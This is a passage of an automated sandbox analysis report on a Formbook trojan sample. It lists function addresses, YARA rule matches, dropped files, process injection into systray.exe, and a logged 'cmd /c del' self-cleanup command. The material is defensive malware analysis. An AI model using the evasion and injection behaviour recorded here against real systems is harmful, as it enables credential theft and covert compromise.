Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD82E2 NtClose,	17_2_02CD82E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD825A NtReadFile,	17_2_02CD825A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD81AA NtCreateFile,	17_2_02CD81AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Code function: 1_2_0662237C CreateProcessAsUserW,

1_2_0662237C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_06621B18	1_2_06621B18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_06620040	1_2_06620040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_066148A2	1_2_066148A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_066163AB	1_2_066163AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_027280C0	1_2_027280C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_0272C5C0	1_2_0272C5C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_0272EE90	1_2_0272EE90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_0272BB98	1_2_0272BB98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_0272BDF0	1_2_0272BDF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C06D	11_2_0041C06D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C284	11_2_0041C284
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041CB0D	11_2_0041CB0D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041CB10	11_2_0041CB10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00408C50	11_2_00408C50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B573	11_2_0041B573
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C781	11_2_0041C781
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00CD2050	11_2_00CD2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D4120	11_2_017D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BF900	11_2_017BF900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018820A8	11_2_018820A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA830	11_2_017DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018828EC	11_2_018828EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871002	11_2_01871002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188E824	11_2_0188E824
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E20A0	11_2_017E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CB090	11_2_017CB090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAB40	11_2_017DAB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187DBD2	11_2_0187DBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018703DA	11_2_018703DA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01882B28	11_2_01882B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EEBB0	11_2_017EEBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018822AE	11_2_018822AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186FA2B	11_2_0186FA2B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018825DD	11_2_018825DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B0D20	11_2_017B0D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01882D07	11_2_01882D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CD5E0	11_2_017CD5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01881D55	11_2_01881D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2581	11_2_017E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C841F	11_2_017C841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187D466	11_2_0187D466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188DFCE	11_2_0188DFCE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01881FF1	11_2_01881FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D6E30	11_2_017D6E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01882EF7	11_2_01882EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187D616	11_2_0187D616
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463D466	17_2_0463D466
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458841F	17_2_0458841F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04641D55	17_2_04641D55
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04642D07	17_2_04642D07
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04570D20	17_2_04570D20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458D5E0	17_2_0458D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046425DD	17_2_046425DD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2581	17_2_045A2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04596E30	17_2_04596E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463D616	17_2_0463D616
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04642EF7	17_2_04642EF7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04641FF1	17_2_04641FF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464DFCE	17_2_0464DFCE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464E824	17_2_0464E824
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631002	17_2_04631002
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459A830	17_2_0459A830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046428EC	17_2_046428EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458B090	17_2_0458B090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046420A8	17_2_046420A8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457F900	17_2_0457F900
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045999BF	17_2_045999BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0462FA2B	17_2_0462FA2B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046422AE	17_2_046422AE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AB40	17_2_0459AB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04642B28	17_2_04642B28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463DBD2	17_2_0463DBD2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046303DA	17_2_046303DA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AEBB0	17_2_045AEBB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDCB0D	17_2_02CDCB0D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDCB10	17_2_02CDCB10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDC781	17_2_02CDC781
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CC2FB0	17_2_02CC2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CC8C50	17_2_02CC8C50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CC2D90	17_2_02CC2D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDB573	17_2_02CDB573

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 017BB150 appears 54 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 0457B150 appears 69 times

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731064405.00000000003A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStudent.exe0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731731070.0000000002801000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.737040753.0000000003758000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAddInProcess32.exeT vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740459563.00000000062B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Binary or memory string: OriginalFilenameStudent.exe0 vs SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@3/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Virustotal: Detection: 33%
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: systray.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, systray.exe, 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe
Source:	Binary string: AddInProcess32.pdbpw source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000000.725190319.0000000000CD2000.00000002.00020000.sdmp, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A3F39 pushfd ; ret	1_2_003A3F49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A3D29 push esp; ret	1_2_003A3D34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A2320 push 450963C2h; retf	1_2_003A2352
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A3111 push 0000001Bh; iretd	1_2_003A3116
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A230E push 450963C2h; retf	1_2_003A2352
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A22B4 push ecx; retf	1_2_003A22B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_003A3AD7 push esi; iretd	1_2_003A3AD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_06610A2A push ds; ret	1_2_06610A51
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_06614F63 push es; iretd	1_2_06615094
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Code function: 1_2_066105E6 pushfd ; iretd	1_2_06610613
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B3F2 push eax; ret	11_2_0041B3F8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B3FB push eax; ret	11_2_0041B462
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B3A5 push eax; ret	11_2_0041B3F8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B45C push eax; ret	11_2_0041B462
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C4CB push es; iretd	11_2_0041C4CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00415E0D push ecx; iretd	11_2_00415E1D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0180D0D1 push ecx; ret	11_2_0180D0E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045CD0D1 push ecx; ret	17_2_045CD0E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDB3FB push eax; ret	17_2_02CDB462
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDB3F2 push eax; ret	17_2_02CDB3F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDB3A5 push eax; ret	17_2_02CDB3F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CC000A push edx; ret	17_2_02CC000B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD5E0D push ecx; iretd	17_2_02CD5E1D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDC4CB push es; iretd	17_2_02CDC4CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CDB45C push eax; ret	17_2_02CDB462

